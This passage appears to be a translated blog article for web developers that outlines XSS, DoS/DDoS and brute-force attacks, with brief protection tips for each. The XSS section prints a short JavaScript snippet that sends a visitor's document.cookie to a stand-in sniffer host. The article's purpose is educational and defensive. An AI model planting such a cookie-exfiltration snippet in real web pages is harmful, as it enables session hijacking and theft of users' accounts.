    And then he needs this very link to the page with an error. Then work on the vulnerability in most cases takes place in the "Kali linux" distribution with its utilities for this part: the introduction of the injection code and the performance of the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.

    XSS Attack

    This type of attack is carried out on Cookies. They, in turn, are very fond of saving users. Why not? How without them? After all, thanks to Cookies, we do not drive in a password from Vk.com or Mail.ru a hundred times. And there are few who refuse them. But on the Internet, a rule often appears for hackers: the coefficient of convenience is directly proportional to the coefficient of insecurity.

    To implement an XSS attack, our hacker needs JavaScript knowledge. The language at first glance is very simple and harmless, because it does not have access to computer resources. A hacker can work with JavaScript only in a browser, but that's enough. After all, the main thing is to enter the code into the web page.

    I won't go into detail about the attack process. I will tell only the basics and the meaning of how this happens.

    A hacker can add JS code to some forum or guestbook:

    Scripts redirect us to an infected page where the code will be executed: be it a sniffer, some kind of storage or an exploit that will somehow steal our Cookies from the cache.

    Why JavaScript? Because JavaScript is great with web requests and has access to cookies. But if our script will transfer us to some site, then the user will easily notice this. Here, the hacker uses a more cunning option - he simply enters the code into the picture.

    Img=newImage();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    We simply create an image and assign our script to it as an address.

    How to protect yourself from all this? Very simple - do not follow suspicious links.

    DoS and DDos Attacks


    DoS (from the English Denial of Service - denial of service) hacker attack on a computer system in order to bring it to failure. This is the creation of such conditions under which conscientious users of the system cannot access the provided system resources(servers), or this access is difficult. The failure of the system can also be a step towards its capture if, in an emergency situation, the software gives out any critical information: for example, the version, part of the program code, etc. But most often it is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid the attack significantly hit the “target” in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow you to bring almost any system to failure without leaving legally significant evidence.

    What is the difference between DoS and DDos attacks?

    DoS is an attack built in a smart way. For example, if the server does not check the correctness of incoming packets, then a hacker can make such a request that will be processed forever, and there will not be enough processor time to work with other connections. Accordingly, customers will receive a denial of service. But it will not work to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can easily cope with such an overload.

    DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there may very well be hundreds or more of them. Even heavy-duty servers may not be able to cope with such an overload. I'll give you an example.

    A DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts screaming loudly. Talking is either impossible or very difficult. Solution: call security, which will calm and take the person out of the room. DDoS attacks are when thousands of such ill-mannered people run in. In this case, the guards will not be able to twist and take everyone away.

    DoS and DDoS are produced from computers, the so-called zombies. These are computers of users hacked by hackers who do not even suspect that their machine is involved in the attack of any server.

    How to protect yourself from this? In general, no way. But you can complicate the task of a hacker. To do this, you need to choose a good hosting with powerful servers.

    Brute force attack

    A developer can come up with a lot of attack protection systems, fully review the scripts we have written, check the site for vulnerabilities, etc. But when it comes to the last step of the site layout, namely when it will just put a password on the admin panel, he can forget about one thing. Password!

    It is strongly not recommended to set a simple password. It can be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and not complex attack - Brute Force.

    Brute force is a dictionary-based password brute-force attack using special programs. Dictionaries can be different: Latin, sorting by numbers, let's say up to some range, mixed (Latin + numbers), and there are even dictionaries with unique symbols @#4$%&*~~`'”\ ? etc.

    Of course, this type of attack is easy to avoid. It is enough to come up with a complex password. Even captcha can save you. And also, if your site is made on CMS, then many of them calculate a similar type of attack and block ip. We must always remember that the more different characters in the password, the harder it is to pick it up.

    How do hackers work? In most cases, they either suspect or already know part of the password. It is quite logical to assume that the user's password will certainly not consist of 3 or 5 characters. Such passwords lead to frequent hacks. Basically, hackers take a range of 5 to 10 characters and add a few characters there that they probably know in advance. Next, generate passwords with the desired ranges. The Kali linux distribution even has programs for such cases. And voila, the attack will no longer last long, since the volume of the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, while the enumeration speed increases by as much as 10 times. And now we see that the attack is in a simple way quite real. But not only sites are subjected to brute force.

    Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always be distracted somewhere or overlook somewhere. We are programmers, but not programmed machines. Be always on the alert, because the loss of information threatens with serious consequences!